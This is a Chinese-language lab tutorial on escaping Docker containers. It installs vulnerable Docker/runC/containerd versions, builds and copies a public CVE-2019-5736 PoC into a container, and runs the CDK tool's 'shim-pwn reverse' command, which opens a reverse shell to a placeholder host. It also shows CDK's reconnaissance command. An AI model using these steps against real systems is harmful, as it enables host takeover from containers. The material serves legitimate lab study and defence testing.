云上攻防-云原生篇&Docker安全&系统内核&版本漏洞&CDK自动利用&容器逃逸

文章目录

云原生-Docker安全-容器逃逸&内核漏洞

细节部分在权限提升章节会详解,常用:

CVE-2016-5195 CVE-2019-16884 CVE-2021-3493

CVE-2021-22555 CVE-2022-0492 CVE-2022-0847 CVE-2022-23222

云原生-Docker安全-容器逃逸&版本漏洞

-CVE-2019-5736 runC容器逃逸

Docker version <= 18.09.2

RunC version <= 1.0-rc6

1、安装docker对应版本

bash 复制代码
apt-get update
apt-get install -y apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
apt-get update
apt-cache madison docker-ce
apt-get install docker-ce=18.06.1~ce~3-0~ubuntu

2、启动环境测试:

bash 复制代码
docker run -itd --cap-add=SYS_ADMIN ubuntu:latest

3、编译修改后EXP后等待管理进入执行
https://github.com/Frichetten/CVE-2019-5736-PoC

bash 复制代码
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go
bash 复制代码
docker cp main 7f4793f3ac0cd13:/
docker exec -it 7f4793f3ac0cd13 /bin/bash

还有一个条件就是执行main文件后需要管理员进入该容器进行触发
4、实验获取到docker搭建的Web权限后进行逃逸

bash 复制代码
docker run -it -p 8888:8080 vulhub/struts2:s2-053

-CVE-2020-15257 containerd逃逸

containerd < 1.4.3

containerd < 1.3.9

1、安装docker对应版本

bash 复制代码
apt-get update
apt-get install ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add -
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu xenial stable"
apt-get update
apt-cache madison docker-ce
apt-get install docker-ce=5:19.03.6~3-0~ubuntu-xenial docker-ce-cli=5:19.03.6~3-0~ubuntu-xenial containerd.io=1.2.4-1

2、启动环境测试:

bash 复制代码
docker pull ubuntu:18.04
docker run -itd --net=host ubuntu:18.04 /bin/bash
docker exec -it 5be3ed60f152 /bin/bash

3、上传CDK自动提权反弹

bash 复制代码
docker cp cdk_linux_amd64 8e7c27d7b98ca32927:/tmp
chmod 777 cdk_linux_amd64
./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx xxxx

4、实验获取到docker搭建的Web权限后进行逃逸

bash 复制代码
docker run -it -p 8888:8080 vulhub/struts2:s2-053

云原生-Docker安全-容器逃逸&CDK自动化

检测利用:https://github.com/cdk-team/CDK
信息收集-漏洞探测

bash 复制代码
./cdk_linux_amd64 evaluate

指定漏洞逃逸

bash 复制代码
./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx xxxx

常规检测:https://github.com/teamssix/container-escape-check

实现:信息收集,指定逃逸,自动逃逸,修复功能等

相关推荐
阿里云云原生35 分钟前
阿里云可观测 2025 年 9 月产品动态
云原生
海云安1 小时前
海云安入选安全牛《企业级AI大模型落地实战技术应用指南(2025版)》优秀案例
人工智能·安全
周杰伦_Jay2 小时前
【PaddleOCR深度解析与DeepSeek-OCR对比】开源OCR工具库的技术路线与场景适配
人工智能·机器学习·云原生·架构·开源·ocr
国科安芯2 小时前
ASP3605A电源芯片在高速ADC子卡中的适配性研究
网络·人工智能·单片机·嵌入式硬件·安全
Wang's Blog2 小时前
Linux小课堂: SSH 免密登录原理与实现之基于公钥认证的安全连接机制
linux·安全·ssh
学编程的小程3 小时前
从被动防御到主动防护:雷池WAF+cpolar的安全实践
安全
七夜zippoe3 小时前
压缩与缓存调优实战指南:从0到1根治性能瓶颈(四)
运维·docker·容器
一念一花一世界4 小时前
Arbess从入门到实战(16) - 使用Arbess+Gitee实现K8s自动化部署
ci/cd·云原生·容器·kubernetes·tiklab
java_logo4 小时前
Docker 部署 MinerU 教程:打造你的本地 PDF 智能处理中心
linux·运维·人工智能·docker·ai·容器·aigc
LCG元4 小时前
Docker容器化实战:将你的SpringBoot应用一键打包部署(三)-配置告警和自动扩缩容
后端·docker